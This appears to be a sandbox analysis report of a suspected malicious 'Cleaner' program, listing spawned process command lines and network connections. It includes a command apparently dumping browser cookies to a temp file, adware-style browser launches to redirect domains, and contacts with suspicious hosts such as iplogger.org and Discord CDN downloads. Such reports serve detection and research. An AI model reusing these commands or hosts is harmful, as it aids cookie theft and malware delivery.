"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1892 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_18F4.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1cc,0x210,0x7ff9c7e1dec0,0x7ff9c7e1ded0,0x7ff9c7e1dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=1824 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1772 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=2192 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2384 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2356 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3208 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3248 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3456 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3564 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3628 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3552 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6940 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6988 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| N/A | 51.124.78.146:443 | tcp | |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.126.31.135:443 | tcp | |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 52.247.37.26:80 | tcp | |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 104.21.5.208:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 8.8.8.8:53 | fsstoragecloudservice.com | udp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 52.219.62.11:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 52.219.62.11:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 52.219.66.11:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.66.11:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
